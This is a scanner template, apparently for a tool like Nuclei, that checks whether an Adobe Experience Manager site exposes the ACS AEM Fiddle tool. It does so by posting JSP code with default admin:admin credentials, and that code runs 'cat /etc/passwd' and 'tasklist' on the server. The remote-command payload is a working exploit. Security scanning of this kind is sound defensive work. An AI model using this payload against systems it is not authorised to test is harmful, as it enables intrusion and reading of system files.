id: aem-fiddle-exposed
info:
  name: AEM Fiddle Exposed
  risk: Critical

params:
  - root: "{{.BaseURL}}"

variables:
  - endpoint: |
      /etc/acs-tools/aem-fiddle/_jcr_content.run.html
      /etc/acs-tools/aem-fiddle/_jcr_content.run.html/amm.css
      /etc/acs-tools/aem-fiddle/_jcr_content.run.html/amm.ico
      /etc/acs-tools/aem-fiddle/_jcr_content.run.html/a.png
      /etc/acs-tools/aem-fiddle/_jcr_content.run.html/amm.json
      /etc/acs-tools/aem-fiddle/_jcr_content.run.html/amm.1.json
      /etc/acs-tools/aem-fiddle/_jcr_content.run.html?amm.css
      /etc/acs-tools/aem-fiddle/_jcr_content.run.html?amm.ico
      /etc/acs-tools/aem-fiddle/_jcr_content.run...4.2.1...html
      /etc/acs-tools/aem-fiddle/_jcr_content.run...4.2.1...html/amm.css
      /etc/acs-tools/aem-fiddle/_jcr_content.run...4.2.1...html/amm.ico
      /etc/acs-tools/aem-fiddle/_jcr_content.run...4.2.1...html/a.png
      /etc/acs-tools/aem-fiddle/_jcr_content.run...4.2.1...html/amm.json
      /etc/acs-tools/aem-fiddle/_jcr_content.run...4.2.1...html/amm.1.json
      /etc/acs-tools/aem-fiddle/_jcr_content.run...4.2.1...html?amm.css
      /etc/acs-tools/aem-fiddle/_jcr_content.run...4.2.1...html?amm.ico

requests:
  - method: POST
    redirect: false
    url: >-
      {{.root}}{{.endpoint}}
    headers:
      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/82.0.4060.0 Safari/537.36
      - Referer: "{{.BaseURL}}"
      - Authorization: "Basic YWRtaW46YWRtaW4="
      - Content-Type: application/x-www-form-urlencoded
    body: scriptdata=%0A%3C%25%40+page+import%3D%22java.io.*%22+%25%3E%0A%3C%25+%0A%09Process+proc+%3D+Runtime.getRuntime().exec(%22cat+/etc/passwd%22)%3B%0A%09%0A%09BufferedReader+stdInput+%3D+new+BufferedReader(new+InputStreamReader(proc.getInputStream()))%3B%0A%09StringBuilder+sb+%3D+new+StringBuilder()%3B%0A%09String+s+%3D+null%3B%0A%09while+((s+%3D+stdInput.readLine())+!%3D+null)+%7B%0A%09%09sb.append(s+%2B+%22%5C%5C%5C%5Cn%22)%3B%0A%09%7D%0A%09%0A%09String+output+%3D+sb.toString()%3B%0A%25%3E%0A%3C%25%3Doutput+%25%3E&scriptext=jsp&resource=
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "root:") && StringSearch("response", "/bin/bash")

  - method: POST
    redirect: false
    url: >-
      {{.root}}{{.endpoint}}
    headers:
      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/82.0.4060.0 Safari/537.36
      - Referer: "{{.BaseURL}}"
      - Authorization: "Basic YWRtaW46YWRtaW4="
      - Content-Type: application/x-www-form-urlencoded
    body: scriptdata=%0A%3C%25%40+page+import%3D%22java.io.*%22+%25%3E%0A%3C%25+%0A%09Process+proc+%3D+Runtime.getRuntime().exec(%22tasklist%22)%3B%0A%09%0A%09BufferedReader+stdInput+%3D+new+BufferedReader(new+InputStreamReader(proc.getInputStream()))%3B%0A%09StringBuilder+sb+%3D+new+StringBuilder()%3B%0A%09String+s+%3D+null%3B%0A%09while+((s+%3D+stdInput.readLine())+!%3D+null)+%7B%0A%09%09sb.append(s+%2B+%22%5C%5C%5C%5Cn%22)%3B%0A%09%7D%0A%09%0A%09String+output+%3D+sb.toString()%3B%0A%25%3E%0A%3C%25%3Doutput+%25%3E&scriptext=jsp&resource=
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", '.exe') && StringSearch("response", 'PID') && StringSearch("response", 'Session')

reference:
  - link: https://adobe-consulting-services.github.io/acs-aem-tools/
